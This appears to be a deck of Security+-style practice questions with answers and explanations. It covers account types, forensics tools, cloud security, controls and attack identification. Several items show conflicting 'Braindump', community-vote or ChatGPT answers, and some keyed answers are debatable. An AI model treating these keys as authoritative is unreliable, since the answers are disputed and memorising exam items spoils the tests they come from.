
A

c. Configuration reviews

Explanation:

While automated vulnerability scans are essential for identifying technical vulnerabilities, configuration reviews are necessary to assess whether systems, networks, and applications are configured securely according to best practices and compliance requirements.
Configuration reviews involve examining settings, policies, access controls, and configurations against established benchmarks or standards to ensure they align with security policies and industry best practices.
Together with vulnerability scans, configuration reviews provide a comprehensive view of the security posture of the organization's IT infrastructure, ensuring that both technical vulnerabilities and misconfigurations are identified and remediated.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
121
Q

A database administrator wants to grant access to an application that will be reading and writing data to a database. The database is shared by other applications also used by the finance department. Which of the following account types is MOST appropriate for this purpose?

a. Service
b. Shared
c. Generic
d. Admin

A

a. Service

Explanation:

A service account is designed for applications and services that need to access resources such as databases without human intervention.
It provides controlled access to specific resources and can be configured with minimal privileges necessary for the application's functions.
Unlike admin accounts, which typically have broader permissions, service accounts are restricted to specific tasks, reducing the risk of accidental or unauthorized access to sensitive data.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
122
Q

A security analyst generated a file named host1.pcap and shared it with a team member who is going to use it for further incident analysis. Which of the following tools will the other team member MOST likely use to open this file?

a. Autopsy
b. Memdump
c. FTK imager
d. Wireshark

A

d. Wireshark

Wireshark is a widely-used network protocol analyzer that allows users to capture and interactively browse the traffic running on a computer network. It supports the opening and analysis of .pcap files, making it ideal for examining network traffic for incident analysis.

Autopsy and FTK Imager are forensic analysis tools primarily used for examining disk images and file systems, which are not typically used for analyzing network packet captures.

Memdump refers to memory dump analysis, which is used for examining the contents of computer memory, rather than network packet captures.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
123
Q

An application developer accidentally uploaded a company’s code-signing certificate private key to a public web server. The company is concerned about malicious use of its certificate. Which of the following should the company do FIRST?

a. Delete the private key from the repository.
b. Verify the public key is not exposed as well.
c. Update the DLP solution to check for private keys.
d. Revoke the code-signing certificate.

A

d. Revoke the code-signing certificate.

Explanation:

When a company's code-signing certificate private key is compromised or exposed, the first step should be to revoke the certificate. Revocation ensures that any signatures made with the compromised key are no longer trusted.
After revoking the certificate, the company should also delete the private key from any public repositories to prevent further misuse.
Verifying the exposure of the public key and updating DLP solutions are important steps but revocation should be prioritized to mitigate immediate risks.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
124
Q

An organization implemented a process that compares the settings currently configured on systems against secure configuration guidelines in order to identify any gaps. Which of the following control types has the organization implemented?

a. Compensating
b. Corrective
c. Preventive
d. Detective

A

d. Detective

Explanation:
The organization has implemented a detective control. Detective controls are designed to detect and alert on deviations from established security policies, procedures, or standards. In this case, comparing the current system settings against secure configuration guidelines helps to detect any gaps or deviations that may exist, allowing the organization to take corrective actions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
125
Q

The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy requiring all unsanctioned high-risk SaaS applications to be blocked from user access. Which of the following is the BEST security solution to reduce this risk?

a. CASB
b. VPN concentrator
c. MFA
d. VPC endpoint

A

a. CASB

Explanation:
CASB (Cloud Access Security Broker) is the best security solution to reduce the risk of shadow IT and unsanctioned high-risk SaaS applications. CASBs provide visibility into cloud application usage, enforce security policies, and control access to cloud services. By using CASB, organizations can monitor and block access to unsanctioned SaaS applications based on security policies, thereby reducing the risk associated with shadow IT.

VPN concentrator:
VPN concentrators are used to provide secure remote access to corporate networks. They do not specifically address the visibility and control needed over SaaS applications or shadow IT. While they can secure communications between users and the corporate network, they do not provide detailed visibility into cloud application usage or the ability to enforce policies on specific SaaS applications.

MFA (Multi-Factor Authentication):
MFA enhances security by requiring additional factors beyond just a password for authentication. While important for access security, MFA does not provide visibility or control over the use of SaaS applications. It addresses user authentication rather than the management of cloud application usage or the identification of unauthorized SaaS applications.

VPC endpoint (Virtual Private Cloud endpoint):
VPC endpoints enable private connections between a VPC and supported AWS services or other services hosted by AWS. They facilitate secure communication without exposing traffic to the public internet. However, they do not address the visibility into SaaS applications or the enforcement of policies related to shadow IT. VPC endpoints are specific to AWS services and do not provide comprehensive control over external SaaS applications used by employees.

In contrast, CASB (Cloud Access Security Broker) solutions are specifically designed to monitor, manage, and secure the use of cloud applications and services, including SaaS applications. They provide visibility into which applications are being used, enforce security policies based on risk assessments, and can block access to unsanctioned applications. Therefore, CASB is the most appropriate choice for addressing the risk of shadow IT and unsanctioned SaaS applications.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
126
Q

A technician enables full disk encryption on a laptop that will be taken on a business trip. Which of the following does this process BEST protect?

a. Data in transit
b. Data in processing
c. Data at rest
d. Data tokenization

A

c. Data at rest

Explanation:

Data at rest refers to data that is stored physically in any digital form (e.g., databases, files, etc.). When full disk encryption is enabled, all data stored on the laptop's disk is encrypted. This means that if the laptop is lost or stolen, unauthorized users cannot access the data without the encryption key, thus protecting the data at rest.

Data in transit refers to data actively moving from one location to another over a network. Full disk encryption does not directly protect data while it is being transmitted over a network; other encryption methods (such as SSL/TLS for web traffic) are used to protect data in transit.

Data in processing refers to data being accessed and manipulated by applications or processes. Full disk encryption does not inherently protect data that is actively being used by the operating system or applications; it focuses on protecting data when it is stored on the disk.

Data tokenization is a method used to protect sensitive data by replacing it with unique identification symbols (tokens) that retain essential information about the data without compromising its security. It is different from encryption, which secures data by transforming it into a ciphertext that can be reversed only with a decryption key.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
127
Q

A security analyst was called to investigate a file received directly from a hardware manufacturer. The analyst is trying to determine whether the file was modified in transit before installation on the user’s computer. Which of the following can be used to safely assess the file?

a. Check the hash of the installation file.
b. Match the file names.
c. Verify the URL download location.
d. Verify the code signing certificate.

A

a. Check the hash of the installation file.

Explanation:

Hash Verification: This involves calculating and comparing the hash value (like MD5, SHA-256, etc.) of the downloaded file with the hash value provided by the hardware manufacturer. If the hash values match, it indicates that the file has not been altered during transit.

Why this is the best option:
    Checking the hash ensures the integrity of the file. Even if the file is intercepted and modified during transit, the hash value would change, alerting the analyst to potential tampering.
    Matching file names and verifying the URL download location do not provide the same level of assurance against tampering as hash verification.
    Verifying the code signing certificate is useful for ensuring the authenticity of the software publisher, but it does not directly confirm whether the file was modified during transit.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
128
Q

A help desk technician receives a phone call from someone claiming to be a part of the organization’s cybersecurity incident response team. The caller asks the technician to verify the network’s internal firewall IP Address. Which of the following is the technician’s BEST course of action?

a. Direct the caller to stop by the help desk in person and hang up declining any further requests from the caller.
b. Ask for the caller’s name, verify the person’s identity in the email directory, and provide the requested information over the phone.
c. Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization’s cybersecurity officer.
d. Request the caller send an email for identity verification and provide the requested information via email to the caller.

A

c. Write down the phone number of the caller if possible, the name of the person requesting the information, hang up, and notify the organization’s cybersecurity officer.

Explanation:

Verify Identity: Asking for the caller's name and verifying it against the email directory is a good first step, but it's not foolproof. Attackers can sometimes spoof identities or use social engineering to gain information.
Notification: Writing down the caller's phone number and name and then notifying the organization's cybersecurity officer ensures that a higher authority can verify the legitimacy of the request. This is crucial in cases where sensitive information like firewall IP addresses is involved.
Declining Further Requests: Hanging up and declining further requests from the caller is important to prevent potential manipulation or unauthorized disclosure of sensitive information.

Options a, b, and d either involve potentially providing information to an unverified caller or do not prioritize verification and escalation to a higher authority, which could lead to security risks.

Therefore, option c is the most appropriate response to ensure security protocols are followed and the organization’s information remains protected.

(Braindump : d. Request the caller send an email for identity verification and provide the requested information via email to the caller)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
129
Q

Which of the following would BEST provide detective and corrective controls for thermal regulation?

a. A smoke detector
b. A fire alarm
c. An HVAC system
d. A fire suppression system
e. Guards

A

c. An HVAC system

Explanation:

An HVAC (Heating, Ventilation, and Air Conditioning) system is designed not only to regulate temperature but also to monitor and control environmental conditions such as humidity and air quality.
HVAC systems typically have sensors that can detect anomalies in temperature and automatically adjust heating or cooling to maintain optimal conditions.
In the context of providing detective controls, HVAC systems can generate alerts or notifications when temperature thresholds are exceeded, indicating potential issues.
For corrective controls, HVAC systems can autonomously adjust settings or activate alarms to alert personnel to take action, such as maintenance or repairs, to prevent overheating or other thermal-related problems.

While options like smoke detectors (a), fire alarms (b), and fire suppression systems (d) are important for fire detection and prevention, they do not directly address thermal regulation concerns as comprehensively as an HVAC system. Guards (e) are physical security measures and do not provide environmental monitoring or regulation capabilities like an HVAC system does.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
130
Q

Which of the following is a benefit of including a risk management framework into an organization’s security approach?

a. It defines expected service levels from participating supply chain partners to ensure system outages are remediated in a timely manner.
b. It identifies specific vendor products that have been tested and approved for use in a secure environment.
c. It provides legal assurances and remedies in the event a data breach occurs.
d. It incorporates control, development, policy, and management activities into IT operations.

A

d. It incorporates control, development, policy, and management activities into IT operations.

Explanation:
A risk management framework (RMF) provides several benefits to an organization’s security approach:

Incorporates control, development, policy, and management activities: RMF integrates various aspects of IT operations, including identifying risks, implementing controls, developing policies, and managing security across the organization. This integration helps ensure that security considerations are embedded throughout the organization's processes and activities.

Option a: This describes more about service level agreements (SLAs) and supply chain management, not directly related to the core benefits of a risk management framework.

Option b: This pertains to product testing and approval, which is part of security assessments but not the primary benefit of an RMF.

Option c: Legal assurances and remedies typically come from compliance frameworks and regulations rather than directly from an RMF.

Therefore, option d is the best answer as it highlights how an RMF helps organizations structure and integrate their security efforts comprehensively.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
131
Q

An organization maintains several environments in which patches are developed and tested before being deployed to an operational status. Which of the following is the environment in which patches will be deployed just prior to being put into an operational status?

a. Development
b. Test
c. Production
d. Staging

A

d. Staging

The environment in which patches will be deployed just prior to being put into an operational status is typically referred to as the Staging environment.

Explanation:

Development: This environment is where patches and new software are initially developed and coded.
Test: After development, patches are tested in this environment to ensure they function correctly and do not introduce new issues.
Staging: The staging environment is used for final testing before deployment to production. It mimics the production environment closely, allowing for realistic testing of patches and updates.
Production: This is the live environment where applications and systems are used by end-users.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
132
Q

During a trial, a judge determined evidence gathered from a hard drive was not admissible. Which of the following BEST explains this reasoning?

a. The forensic investigator forgot to run a checksum on the disk image after creation.
b. The chain of custody form did not note time zone offsets between transportation regions.
c. The computer was turned off, and a RAM image could not be taken at the same time.
d. The hard drive was not properly kept in an antistatic bag when it was moved.

A

b, “The chain of custody form did not note time zone offsets between transportation regions.”

Explanation:

Chain of Custody: This refers to the documented trail showing the seizure, custody, control, transfer, analysis, and disposition of physical and electronic evidence. It ensures that evidence is handled properly and maintains its integrity.
Time Zone Offsets: When evidence is moved across different time zones, it is crucial to document any changes in time to establish a clear timeline of events and ensure the integrity of the evidence.

If the chain of custody form did not accurately note the time zone offsets during transportation of the hard drive, it could raise doubts about the continuity and integrity of the evidence. This lack of documentation could lead to the judge ruling the evidence as inadmissible due to concerns over its handling and authenticity.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
133
Q

An organization wants to implement a biometric system with the highest likelihood that an unauthorized user will be denied access. Which of the following should the organization use to compare biometric solutions?

a. FRR
b. Difficulty of use
c. Cost
d. FAR
e. CER

A

d, FAR (False Acceptance Rate).

Explanation:

False Acceptance Rate (FAR): FAR represents the probability that the system incorrectly identifies an unauthorized user as an authorized user. A lower FAR indicates a lower likelihood of unauthorized access, as it means the system is less likely to incorrectly accept someone who should not have access.

In contrast:

False Rejection Rate (FRR): FRR represents the probability that the system incorrectly rejects an authorized user. While minimizing FRR is also important for user convenience, minimizing FAR is critical for security to ensure that unauthorized users are not granted access.

Therefore, by comparing biometric solutions based on their FAR values, the organization can select a system that provides the highest likelihood of denying access to unauthorized users.

(Braindump : e. CER)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
134
Q

A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate network was not breached, but documents were downloaded from an employee’s COPE tablet and passed to the competitor via cloud storage. Which of the following is the BEST remediation for this data leak?

a. User training
b. CASB
c. MDM
d. DLP

A

d, DLP (Data Loss Prevention).

Explanation:

DLP (Data Loss Prevention): DLP solutions are designed to monitor and control the movement of sensitive data within and outside the organization's network. They can detect and prevent unauthorized transfers of sensitive information, such as documents being uploaded to unauthorized cloud storage services.

CASB (Cloud Access Security Broker): While CASB solutions can monitor and control the use of cloud services and applications, they typically work in conjunction with DLP solutions rather than being a direct replacement. CASB focuses more on securing cloud applications and data rather than detecting data leaks from devices.

MDM (Mobile Device Management): MDM solutions manage and secure mobile devices like tablets, including enforcing policies and managing access controls. However, in this case, the issue is not with device management but with preventing unauthorized data transfers.

User Training: While user training is crucial for security awareness, it alone may not prevent sophisticated data leaks involving intentional data exfiltration via personal cloud storage.

(Braindump : d. CASB)
Explanation: While data loss prevention is the goal, in order to implement dlp in cloud applications you need to deploy a casb.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
135
Q

An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping site. Later, the user received an email regarding the credit card statement with unusual purchases. Which of the following attacks took place?

a. On-path attack
b. Protocol poisoning
c. Domain hijacking
d. Bluejacking

A

a. On-path attack

Explanation:

On-path attack: In this type of attack, the attacker intercepts communication between two parties (in this case, the user and the shopping site) and can alter or eavesdrop on the data being transmitted. By spoofing the IP address of the shopping site, the attacker can misdirect the user’s communication, leading to potential interception of sensitive information like credit card details. This aligns with the scenario where the user later receives an email about unusual purchases, indicating that their credit card information may have been compromised during the transaction.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
136
Q

A company is considering transitioning to the cloud. The company employs individuals from various locations around the world. The company does not want to increase its on premises infrastructure blueprint and only wants to pay for additional compute power required. Which of the following solutions would BEST meet the needs of the company?

a. Private cloud
b. Hybrid environment
c. Managed security service provider
d. Hot backup site

A

b. Hybrid environment

Here’s why:

Hybrid environment combines aspects of both public and private clouds, allowing the company to leverage the benefits of both models. In this scenario:
    The company can keep critical or sensitive data and applications on-premises or in a private cloud for security and compliance reasons.
    It can use public cloud resources to scale compute power as needed without investing in additional on-premises infrastructure.
    Employees from various locations around the world can access cloud resources easily, promoting flexibility and scalability.

Private clouds are hosted on-premises or by a third-party provider and offer dedicated resources for a single organization.
While private clouds provide more control and security, they typically require initial infrastructure investment and may not scale as flexibly as needed without additional hardware.

MSSPs offer outsourced monitoring and management of security devices and systems.
While MSSPs can enhance security posture, they do not directly address the company's need for scalable compute resources without increasing on-premises infrastructure.

A hot backup site is a replicated data center that mirrors the primary data center, ready to take over operations if the primary site fails.
While important for disaster recovery and business continuity, it doesn't directly address the requirement for additional compute power on demand without increasing infrastructure.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
137
Q

After multiple on premises security solutions were migrated to the cloud, the incident response time increased. The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

a. CASB
b. VPC
c. SWG
d. CMS

A

a. CASB (Cloud Access Security Broker)

Here’s why CASB is the most appropriate choice:

Centralized Visibility and Control: CASB solutions provide centralized visibility into cloud services being used across the organization, including shadow IT, and enforce security policies consistently across all cloud services.

Data Correlation and Analysis: CASBs enable security teams to correlate data from various cloud services into a single console. This helps in quickly identifying and responding to security incidents without having to switch between multiple cloud consoles.

Incident Response Automation: Some CASB solutions offer incident response automation capabilities, which can further streamline response times by automating routine tasks and responses to security incidents.

Compliance Monitoring: CASBs assist in monitoring compliance with security policies and regulatory requirements across all cloud services, which is crucial after migrating security solutions to the cloud.

Why the Other Options are Less Suitable:

VPC (Virtual Private Cloud): VPCs provide isolated network environments within the cloud, focusing on network segmentation rather than incident response optimization.

SWG (Secure Web Gateway): SWGs are typically used for web traffic security, not for optimizing incident response across various cloud services.

CMS (Content Management System): CMS platforms are used for managing digital content and do not address incident response or security management in cloud environments.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
138
Q

Which of the following control types would be BEST to use in an accounting department to reduce losses from fraudulent transactions?

a. Recovery
b. Deterrent
c. Corrective
d. Detective

A

b. Deterrent

Reasoning:

Deterrent controls are designed to discourage potential perpetrators from committing fraudulent activities by emphasizing the potential consequences or highlighting the difficulty of successfully carrying out such activities.

In an accounting department, deterrent controls can include policies and procedures that clearly outline the consequences of fraud, regular audits and reviews, segregation of duties to prevent collusion, and strong authentication and authorization mechanisms for financial transactions.

Unlike corrective controls, which are implemented after an incident has occurred, deterrent controls aim to prevent fraudulent activities from happening in the first place by creating a strong deterrent effect.

Recovery controls:
Purpose: Recovery controls are focused on recovering from incidents after they have occurred, such as through insurance policies or backup systems. They do not directly prevent fraudulent transactions but rather aim to mitigate the impact after the fact.

Corrective controls:
Purpose: Corrective controls are implemented to correct issues that led to fraudulent transactions once they have been identified. Examples include improving internal controls or conducting forensic investigations post-incident. They do not prevent fraud proactively but rather respond to it after detection.

Detective controls:
Purpose: Detective controls are used to detect fraudulent transactions after they have occurred. Examples include monitoring and analytics tools that identify unusual or suspicious activities. While detective controls are important for detecting fraud early, they do not prevent fraud from happening in the first place.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
139
Q

A company is receiving emails with links to phishing sites that look very similar to the company’s own website address and content. Which of the following is the
BEST way for the company to mitigate this attack?

a. Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing.
b. Generate a list of domains similar to the company’s own and implement a DNS sinkhole for each.
c. Disable POP and IMAP on all Internet-facing email servers and implement SMTPS.
d. Use an automated tool to flood the phishing websites with fake usernames and passwords.

A

b. Generate a list of domains similar to the company’s own and implement a DNS sinkhole for each.

Explanation:

DNS Sinkholing: This approach involves redirecting traffic from known malicious domains (or domains that resemble the company's legitimate domain) to a non-existent or controlled server. By implementing DNS sinkholing for domains similar to the company's own, the company can prevent users from accessing phishing sites that mimic its domain. This method is effective because it doesn't rely on users recognizing phishing emails but rather blocks access to malicious sites at the network level.

Let’s briefly assess why the other options are less effective or inappropriate:

a. Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing: While honeynets can be useful for detecting and monitoring attackers, they are not directly mitigating the phishing attack itself. They focus more on detecting post-compromise activities rather than preventing initial phishing attempts.

c. Disable POP and IMAP on all Internet-facing email servers and implement SMTPS: This would enhance email server security but does not directly address the issue of users being lured to phishing sites that resemble the company's domain.

d. Use an automated tool to flood the phishing websites with fake usernames and passwords: This approach is not recommended as it can lead to legal and ethical issues (e.g., creating potential harm to innocent parties or violating laws against unauthorized access). It also does not prevent users from falling victim to phishing attacks.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
140
Q

A SOC operator is receiving continuous alerts from multiple Linux systems indicating that unsuccessful SSH attempts to a functional user ID have been attempted on each one of them in a short period of time. Which of the following BEST explains this behavior?

a. Rainbow table attack
b. Password spraying
c. Logic bomb
d. Malware bot

A

b. Password spraying

Explanation:

Password Spraying: This attack involves attempting a small number of commonly used passwords or passwords based on known information (such as the company name or season) against multiple accounts or systems. Unlike brute force attacks that target one user with many passwords, password spraying targets many users with a few common passwords. This method is effective because it can evade traditional brute force detection mechanisms and still potentially gain access if weak passwords are in use.

Let’s briefly assess why the other options are less likely:

a. Rainbow table attack: Rainbow table attacks are used to crack passwords that have been hashed and stored insecurely. They involve precomputed hashes, not repeated attempts with the same password across different accounts or systems.

c. Logic bomb: A logic bomb is malicious code intentionally inserted into a system to execute a harmful action when certain conditions are met, such as a specific date or time. It is not related to repeated login attempts.

d. Malware bot: While bots can be involved in many types of attacks, such as distributed denial-of-service (DDoS) attacks or spreading malware, they typically do not engage in repeated unsuccessful login attempts unless specifically designed for that purpose.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
141
Q

A tax organization is working on a solution to validate the online submission of documents. The solution should be carried on a portable USB device that should be inserted on any computer that is transmitting a transaction securely. Which of the following is the BEST certificate for these requirements?

a. User certificate
b. Self-signed certificate
c. Computer certificate
d. Root certificate

A

(Braindump : a. User certificate)
(Community : A 68%, C 24%)

User Certificate: User certificates specify which resources a given user can have access to. They are sometimes used on devices that several users share. When different users log in, their profile and certificate are automatically loaded, granting them access to their required information.

Self-signed certificate: A self-signed certificate is one that is not signed by a CA at all – neither private nor public. In this case, the certificate is signed with its own private key, instead of requesting it from a public or a private CA (Certificate Authority).

Root Certificate: Root certificates are the cornerstone of authentication and security in software and on the Internet. They’re issued by a certified authority (CA) and, essentially, verify that the software/website owner is who they say they are.

So for this verification I’m completely 100% sure is A: User certificate

ChatGPT:
a. User certificate
Explanation:

A user certificate is best suited for validating the online submission of documents in this scenario. Here’s why:

User certificate: This type of certificate is typically issued to individual users and can be used for authentication, email encryption, and digital signatures. It ensures that the user submitting the document is authenticated and that the submission is secure. This fits well with the requirement to validate online submissions securely.

Self-signed certificate: These are certificates that are not issued by a trusted certificate authority (CA). They are generally not suitable for secure transactions over the internet because they cannot be independently verified by a third-party CA.

Computer certificate: This type of certificate is issued to devices to authenticate them on a network. While useful for ensuring that a device is trusted, it is not the best fit for validating user-submitted documents.

Root certificate: This is a top-level certificate in a certificate hierarchy, used to sign other certificates. While crucial for the overall PKI infrastructure, a root certificate itself is not used directly for end-user authentication or document submission.

Thus, a user certificate is the best option for securely validating the online submission of documents using a portable USB device.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
142
Q

A routine audit of medical billing claims revealed that several claims were submitted without the subscriber’s knowledge. A review of the audit logs for the medical billing company’s system indicated a company employee downloaded customer records and adjusted the direct deposit information to a personal bank account.
Which of the following does this action describe?

a. Insider threat
b. Social engineering
c. Third-party risk
d. Data breach

A

a. Insider threat.

Explanation:

Insider threat: This refers to a threat posed to an organization's security and data by individuals within the organization, such as employees, contractors, or partners, who have authorized access. In this scenario, the employee has misused their authorized access to download customer records and manipulate direct deposit information for personal gain.

Social engineering: Involves manipulating individuals to divulge confidential information or perform actions that compromise security. While social engineering can be involved in some aspects of an insider threat (such as convincing someone to provide access), the primary issue here is the misuse of authorized access rather than external manipulation.

Third-party risk: Refers to risks associated with vendors, suppliers, or partners who have access to an organization's systems or data. There's no indication in the scenario that a third-party entity was directly involved in this incident.

Data breach: Involves unauthorized access to sensitive data. While the employee's actions could lead to data breaches, the core issue here is the misuse of access rather than an external breach.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
143
Q

A recent audit cited a risk involving numerous low-criticality vulnerabilities created by a web application using a third-party library. The development staff state there are still customers using the application even though it is end of life and it would be a substantial burden to update the application for compatibility with more secure libraries. Which of the following would be the MOST prudent course of action?

a. Accept the risk if there is a clear road map for timely decommission.
b. Deny the risk due to the end-of-life status of the application.
d. Use containerization to segment the application from other applications to eliminate the risk.
d. Outsource the application to a third-party developer group.

A

a. Accept the risk if there is a clear road map for timely decommission.

Explanation:

Accept the risk if there is a clear road map for timely decommission: This option acknowledges the existence of low-criticality vulnerabilities in the web application due to the end-of-life status of the application and the burden associated with updating it. However, it proposes accepting the risk temporarily, under the condition that there is a clear plan and timeline for decommissioning the application. This approach allows the organization to continue serving existing customers while working towards a planned retirement or replacement of the application.

Deny the risk due to the end-of-life status of the application: Denying the risk might not be feasible as the vulnerabilities still exist regardless of the application's end-of-life status.

Use containerization to segment the application: While containerization can help isolate and mitigate risks, it doesn't directly address the underlying vulnerabilities in the third-party library.

Outsource the application to a third-party developer group: Outsourcing might introduce additional risks and complexities, especially if the application is already nearing its end-of-life phase.

(Braindump : d. Use containerization to segment the application from other applications to eliminate the risk.)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
144
Q

A security analyst is evaluating solutions to deploy an additional layer of protection for a web application. The goal is to allow only encrypted communications without relying on network devices. Which of the following can be implemented?

a. HTTP security header
b. DNSSEC implementation
c. SRTP
d. S/MIME

A

a. HTTP security header

Explanation:

HTTP security header: Specifically, implementing HTTP Strict Transport Security (HSTS) header ensures that all communication between the client and server occurs over HTTPS, thereby enforcing encrypted communications for the web application. This header instructs web browsers to only interact with the server using HTTPS, even if the user attempts to access the site over HTTP initially.

DNSSEC implementation: DNSSEC (Domain Name System Security Extensions) is used to authenticate DNS responses, ensuring that the domain name lookup results are not tampered with, but it does not directly enforce encrypted communications between the client and server.

SRTP (Secure Real-time Transport Protocol): SRTP is used for securing voice and video communications over IP networks, not typically used for securing web applications.

S/MIME (Secure/Multipurpose Internet Mail Extensions): S/MIME is used for securing email communications, not web applications.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
145
Q

A company labeled some documents with the public sensitivity classification. This means the documents can be accessed by:

a. employees of other companies and the press.
b. all members of the department that created the documents.
c. only the company’s employees and those listed in the document.
d. only the individuals listed in the documents.

A

a. employees of other companies and the press.

Here’s why:

Public Sensitivity Classification: Typically, documents classified as "public" are intended to be accessible to anyone, including the general public, employees of other companies, and the press. This classification indicates that the information within these documents is not confidential and does not pose any risk to the company if widely distributed.

The other options are more restrictive and do not align with the “public” classification:

All members of the department that created the documents: This would imply a more restricted classification, such as "internal" or "departmental."
Only the company's employees and those listed in the document: This would be a more restricted classification, like "confidential" or "internal use only."
Only the individuals listed in the documents: This suggests a highly restricted classification, like "confidential" or "restricted."
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
146
Q

Which of the following is the MOST relevant security check to be performed before embedding third-party libraries in developed code?

a. Check to see if the third party has resources to create dedicated development and staging environments.
b. Verify the number of companies that downloaded the third-party code and the number of contributions on the code repository.
c. Assess existing vulnerabilities affecting the third-party code and the remediation efficiency of the libraries’ developers.
d. Read multiple penetration-testing reports for environments running software that reused the library.

A

c. Assess existing vulnerabilities affecting the third-party code and the remediation efficiency of the libraries’ developers.

Explanation:

Option a (Check to see if the third party has resources to create dedicated development and staging environments): While having dedicated environments is beneficial, it is not the most relevant security check when embedding third-party libraries. The primary concern should be the security of the code itself.

Option b (Verify the number of companies that downloaded the third-party code and the number of contributions on the code repository): The popularity and activity on a code repository can provide some insight into the library's reliability and community support, but they do not directly address the security aspects of the code.

Option d (Read multiple penetration-testing reports for environments running software that reused the library): Penetration-testing reports can be useful, but they are specific to particular environments and configurations. They might not cover all potential vulnerabilities of the library.

Option c is the most relevant security check because it directly addresses the security concerns related to the third-party library by assessing known vulnerabilities and the effectiveness of the developers in addressing those vulnerabilities. This check ensures that the library does not introduce security risks into the developed code.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
147
Q

A help desk technician receives an email from the Chief Information Officer (CIO) asking for documents. The technician knows the CIO is on vacation for a few weeks. Which of the following should the technician do to validate the authenticity of the email?

a. Check the metadata in the email header of the received path in reverse order to follow the email’s path.
b. Hover the mouse over the CIO’s email address to verify the email address.
c. Look at the metadata in the email header and verify the “From:” line matches the CIO’s email address.
d. Forward the email to the CIO and ask if the CIO sent the email requesting the documents.

A

(Community : A 47%, D40%,)
ChatGPT & Brain Dump :
a. Check the metadata in the email header of the received path in reverse order to follow the email’s path.

Explanation:

Option a (Check the metadata in the email header of the received path in reverse order to follow the email's path): This method involves examining the email headers to trace the actual path the email took to reach the technician. It can help identify if the email originated from a legitimate source or if it was spoofed.

Option b (Hover the mouse over the CIO's email address to verify the email address): While this can reveal if the displayed email address matches the actual address, it does not provide complete information about the legitimacy of the email. Spoofed emails can still display the correct address.

Option c (Look at the metadata in the email header and verify the "From:" line matches the CIO's email address): Checking the "From:" line alone is not sufficient because it can be easily spoofed. Comprehensive analysis of the full header metadata is required.

Option d (Forward the email to the CIO and ask if the CIO sent the email requesting the documents): This is not practical if the CIO is on vacation and may not respond promptly. Additionally, forwarding a potentially malicious email can introduce risks.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
148
Q

A company needs to validate its updated incident response plan using a real-world scenario that will test decision points and relevant incident response actions without interrupting daily operations. Which of the following would BEST meet the company’s requirements?

a. Red-team exercise
b. Capture-the-flag exercise
c. Tabletop exercise
d. Phishing exercise

A

c. Tabletop exercise

Explanation:

Option a (Red-team exercise): A red-team exercise involves simulating an attack to test the company's defenses. While effective, it can be disruptive to daily operations and is more about testing security defenses rather than decision-making processes in incident response.

Option b (Capture-the-flag exercise): This type of exercise is typically a competitive event that focuses on problem-solving and technical skills in a controlled environment. It is not designed to test an organization's incident response plan or decision-making processes.

Option c (Tabletop exercise): A tabletop exercise is a discussion-based session where team members walk through a simulated incident scenario and discuss their responses. It is an effective way to test decision points and incident response actions without interrupting daily operations, making it the best fit for the company's requirements.

Option d (Phishing exercise): A phishing exercise tests the organization's susceptibility to phishing attacks and typically focuses on the security awareness of employees. It does not validate an incident response plan or decision-making processes in the same comprehensive way as a tabletop exercise.

Option c (Tabletop exercise) is the best choice because it allows the company to validate its incident response plan by walking through a real-world scenario, testing decision points, and discussing relevant actions in a controlled, non-disruptive manner.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
149
Q

Security analysts are conducting an investigation of an attack that occurred inside the organization’s network. An attacker was able to collect network traffic between workstations throughout the network. The analysts review the following logs:

VLAN Address
1 0007.1r5d.3213
1 002a.7d.44.8801
1 0011.aab4.344d

The Layer 2 address table has hundreds of entries similar to the ones above. Which of the following attacks has MOST likely occurred?

a. SQL injection
b. DNS spoofing
c. MAC flooding
d. ARP poisoning

A

c. MAC flooding

Explanation:

Option a (SQL injection): This is a type of attack that targets databases through web applications by injecting malicious SQL queries. It is unrelated to Layer 2 (data link layer) attacks and would not involve the Layer 2 address table.

Option b (DNS spoofing): This attack involves corrupting the DNS cache or responses to redirect traffic to a malicious site. It affects DNS resolution rather than the Layer 2 address table.

Option c (MAC flooding): This attack involves overwhelming a network switch's MAC address table with a large number of entries. Once the table is full, the switch can start broadcasting traffic to all ports, allowing an attacker to capture network traffic between other devices on the network. The provided logs with hundreds of similar entries suggest that the switch’s MAC address table has been flooded.

